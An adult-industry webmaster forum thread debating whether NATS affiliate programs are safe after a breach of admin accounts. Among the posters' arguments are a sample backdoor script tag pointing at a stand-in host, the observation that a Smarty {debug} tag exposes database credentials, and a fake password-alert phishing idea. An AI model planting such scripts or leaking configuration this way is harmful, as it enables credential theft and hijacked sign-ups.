HunkyLuke

Here is the list of affiliate sites that I have heard from so far who have confirmed their NATS installations have been "patched", ie, all recommended safety precautions have been taken:
HunkMoney
IslandDollars
ZBuckZ
HapiCash

Who else? Please add any other affiliate programs that have confirmed they have addressed this issue, as recommended by TMM. Program owners, if you have already taken actions, please let us know here!

cheers,
Luke

TheDoc

You can add all NATS programs to that list now.

Once TMM found out about this they went in and changed the PW's on programs they had access for. They didn't keep the new info, just fyi.

Everyone else would have had IP protection in place or previously had removed/changed the TMM account details. Meaning the data was already secure.

__________________

HunkyLuke

Thanks TheDoc, I must have missed that in all the threads recently!

cheers,
Luke

uno

PanchoDog has had IP protection for a very long time.

__________________
-uno
icq: 111-914
CrazyBabe.com - porn art
MojoHost - For all your hosting needs, present and future. Tell them I sent ya!

TheDoc

Good stuff.. I really think a great deal of clients did use the protection.

I was avoiding listing all the people that I know did use the Ip protection. Ya miss a few people and the ICQ's of butt hurt people start

__________________

SmokeyTheBear

wait wait wait , gotta set things straight here.

In my opinion no sponsors are safe until they have had a security audit.

The nats admins usernames were stolen, there are hundreds of places the hacker could have injected code that is still UNACTIVATED. regardless of if the admins have been removed, ip's locked down and patched up..

just because you are patched, doesnt mean you are safe. I suggest all sponsors who want to make sure not only for themselves but for their affiliates should clarify if they had a security audit and what was done in the audit. I suggest that any nats sponsor that was compromised using the nats admins passwords should probably send the bill to nats for the security audit or ask nats to supply you one. but this is only my opinion, i have no idea if nats plans on paying for these.

__________________
hatisblack at yahoo.com

TheDoc

Smokey, I thought about this more.. I agree, but overall... Not really.

They can't run/upload/execute anything without it being a plugin / script uploaded via FTP first. You can't upload or add anything to the system via the NATS admin. Smarty won't run php, can't do includes, won't do redirects.. NATS locked down several exploitable parts of smarty already.

So other than direct join template changes or an iframe exploit in the admin templates (which would take 2 seconds to look and see).. I don't really think they could do much damage this way.

Now, they could have deleted members, webmasters, templates, sites, programs, ect.. A small issue needles to say.

__________________

Theo

TheDoc is right on this.

chri$tian

Our IP protection to the admin of NATS was put in place early last week before this news broke, but I agree with TheDoc.. More needs to be done.

__________________
http://www.3dsex.com

borked

Nope, Smokey is right on this one.

for those of you that don't know Smarty, the template engine for NATS, all one needs to do is add
{debug}
to any template and you've given away a *lot* of info.

A *FULL* security audit is required by *EVERY* programme that runs NATS. Period.

__________________

For coding work - hit me up on andy // borkedcoder // com
(consider figuring out the email as test #1)

borked

I know you guys lock down your MySQL to specific IPs - not everyone is so tight.

__________________

For coding work - hit me up on andy // borkedcoder // com
(consider figuring out the email as test #1)

SmokeyTheBear

it would only take 2 seconds to look and see obvious non-human logins in the nats admin but they missed that for months right .. if you dont look for things they are hard to see .. if they were smart enough to steal the master nats passwd list and build software to remotely retrieve data on a daily basis from numerous sponsors , it doesn't seem a far stretch they would do something as simple as edit a template and drop in a few backdoor scripts incase the admin ever found out the password list was compromised. infact i would think that would be the very very first thing they would do..

__________________
hatisblack at yahoo.com

TheDoc

This tells you about errors and what smarty calls to make. You can not call everything from the debug menu into a nats template. It isn't a security issue of any kind.

MYSQL has nothing to do with this, nor protecting mysql. The IP lock feature is within the Admin area and instantly stopped this attack from happening.


Looking at the logins vs looking at discolored admin templates which never flip ownership, really stands out in NATS. Logins, not so much.

You can't do anything with the templates, you can't execute, upload, backdoor anything. They are nothing more than text files, executed as text/html.

The password list is TMM admin accounts on NATS. Not ALL NATS admin accounts or any other admins, webmasters, ect.. Only the TMM admin accounts were breached.

__________________

SmokeyTheBear

script src=http://secretstuff.com/backdoor.js

could be empty right now (i.e unnoticed) and waiting to scoop

__________________
hatisblack at yahoo.com

TheDoc

What could it do other than run local js on a pc?

__________________

TheDoc

Wait, yeah duh, key stroker.. I can check some programs right fast, most people never touch the admin templates so it really only takes a second to look. And I check the access template since it's the first.

Outside of those, unless you point out a different reason, I don't see that this would do anything.

__________________

SmokeyTheBear

well it could redirect joins that would be pretty bad.

if it redirected the joins to a carding page that would be even worse.

__________________
hatisblack at yahoo.com

borked

Oh I'm sorry, maybe I was misreading the $config array output from {debug}

{$config} Array (168)
DB_SERVER => "xxxxxxx"
DB_USER => "xxxxxxx"
DB_PASSWORD => "xxxxxxx"
DB_DB => "xxxxxxx"

My bad, this has nothing to do with mysql at all.

__________________

For coding work - hit me up on andy // borkedcoder // com
(consider figuring out the email as test #1)

TheDoc

ok, they do need to be checked.. But prob more focused on the join forms, give admin templates a quick one over, and hand check the access template.

Either way though, nobody is uploading, adding code, creating a backdoor, ect through the NATS admin. However, nasty shit can be done either way.

__________________

SmokeyTheBear

before they are given the all clean.

I dont wanna give away too much but fact is the basics got overlooked or this would have been noticed by both nats and the sponsors themselves ages ago ( or was and was ignored ) if someone was smart they likely knew this wouldnt last forever ( admin access ) , place a small js for a fake " nats update your password security alert" in the admin section , so when sponsors learn of this right now like they have they would think oh gee this must be legit" wham bam recompromised

__________________
hatisblack at yahoo.com

AlienQ - BANNED FOR LIFE

I think this subject is....

__________________

will76

getting TheDoc to be carefull on this issue seems to be near impossible. He has been down playing this from day 1 when he was saying he "seems to believe that only emails were stolen". This thread is a perfect example of someone being too quick to give the " all clear" and wanting the issue to be down played and to go away. If smokey wouldn't have convinced him after several posts, people would be reading the doc's inital posts here saying that all NATS programs were now safe. Another assumption he obviously knows nothing about. I'm not bashing on NATS but i agree with SMokey it would be wise to have an audit of yoru server to double check everything, where as the doc would tell it is all fine, nothing to worry about.

__________________
ICQ: 86364801 Email: will [at] innovativeassets [dot] com

TheDoc

I'm talking to Smokey over ICQ about this well before this post was made. I haven't given the all clear to anything. I'm hear to learn so I can educate my clients and NATS on what to do.. Please don't confuse me with some jackass.

I still DON'T think a program needs to do a check. But to be safe they might as well. With the console issue or 1000 other possible problems, the fact remains the ONLY got email / member data.


Don't pull me into your little twisted post games or I will eat you alive and spit your ass back out.

__________________

WiredGuy

I think its just beginning.
WG

__________________
I play with Google.

TheDoc

Now back to you.. Interesting and you are correct.

Can it be removed and still have the debug console?

I went in and checked 5 people, only 2 of us (me included) have the debug on. I don't remember turning my on but I am going to get my host to tell me how to turn it on/off.

I would bet though, now that you pointed this out, more changes will be made. That damn console is handy but that could be deadly.

Again, pointing out at how bad it could have been - vs what it really was.

__________________

will76

game? here i am telling people to error on caution and you are telling them the complete opposite.


TITLE OF THIS THREAD: your reply: RIGHT FUCKING THERE you say you can add all programs to the safe list. Then after several of smokey's posts you post: Now you are saying

So you want to resort to personal attacks / threats now? No need for me to play games or twist things when all I need to do is quote you.

__________________
ICQ: 86364801 Email: will [at] innovativeassets [dot] com

TheDoc

Yes, Will76, NATS has been "Patched and is now Safe".. That is 100% correct.

Please take your drama bullshit to another thread and let us adults conduct business.

__________________

JOKER

And I think giving programs / affiliates a false sense of security might not be the best idea, but of course that's just me.

John himself stated that they had access to everything an admin would have access to - yet you're saying it's a FACT that they only got email / member data - how can you be so sure, have you done a full security audit to programs that you have access to? How can you be so sure, if you don't know what these guys are really capable of?

No offense, really - and believe me, I'd like to see this go away as fast as every other webmaster / program owner as well, it's just that you know, better be safe and 100% sure than sorry.

It's great that there is work being done and that you're a part of it

__________________
Facilitation - BizDev - Traffic - Consulting - Marketing
Skype: jokerempire | Silent Circle: joker

will76

Thats not at question, if NATS is now safe or not. Maybe you should read the title again: NATS PROGRAMS. Someone was asking which programs using NATS was safe. You saw " NATS and SAFE" and you jumped in to say " ALL OF THEM". Obviously you still don't understand the subject of the thread since your reply is NATS has been "Patched and is now Safe".. no one has disputed that. Every one knows that it was a password list and that NATS deleted the passwords.

No Drama, and you can continue to reply with insults if you like and try to start a pissing match but I prefer to stick to the topic. Smokey pointed out where people should get their stuff checked. I agree better to be safe and do the right thing. I am just curious why you so quick to tell people that all programs using NATS on their servers are 100% safe. How do you know that? did you check everyone's servers as smokey mentioned?

__________________
ICQ: 86364801 Email: will [at] innovativeassets [dot] com

TheDoc

I think the question asked was "have confirmed their NATS installations have been "patched", ie, all recommended safety precautions have been taken"

No reason to twist this, the answer again is 100% YES! All NATS programs have had all recommenced safety precautions taken.

Everything else is how to IMPROVE on it and find more possible holes that could be exploited.

And I did agree with Smokey, and I agreed that people should check the installs. But I do not think or agree that they will find any problems due to the fact that a human didn't enter the programs, but rather a bot, which pulled information from reports. So even the debug screen is pointless, but that doesn't mean it isn't something that shouldn't be addressed for future problems.


And with you, I didn't say "all clear" as you quoted me saying. So if you want to twist my words I will continue to bash you.

__________________

TheDoc

The NATS program that had been breached are now secure, that isn't false.



It was a bot, going in and pulling, it appears, 5 reports from the admin/webmaster cvs reports. These reports pull member and webmaster data when transactions come through. I think this is why Webmaster baited emails were hit harder than member emails. Harder to see who is fresh and who isn't with Members, without running an sql query.

This needed to happen, NATS needed to improve its security. It doesn't need all these people that have never used NATS telling Webmasters what they view the problem is.

So when people are saying it isn't secure, well.. You are right, but neither is any other affiliage program for that mater, or google, or anyone. So nobody can ever give the 100% all clear vote, we can only state what we know....

That nats is clear of the issue it had and we should all move on and start making more money.

__________________

BluMedia

We took action as soon as we heard about the issue. Add IntenseCash to that list.

Mark

__________________
IntenseCash - If you can't convert us then you might want to look for a new job
.
BrokeStraightBoys.com converting 1:124 stats counted by Nats

SkeetSkeet

we are good to go www.starlightbucks.com

__________________

ICQ 283633188

Trixxxia

MassiveDollars (and all clients of our host) have IP protection. It can be a pain in the butt sometimes but now I'm sure everyone is GLADLY going to grin rather than growl when they need to get an IP authorized.

Despite knowing we are protected, we meticulously went through all IPs that accessed as admins to make sure everyone checked out and matched. All good there.

Smokey, borked, quantum-x(in some other threads) and TheDoc - thanks for using your collective brains & experience to foresee any 'possible' issues and giving indications of what to look out for. I personally appreciate it and sleep better at night knowing I've dotted my 'i's' and crossed my 't's - EVEN if we were protected. Like JokerEmpire said - Better safe than sorry.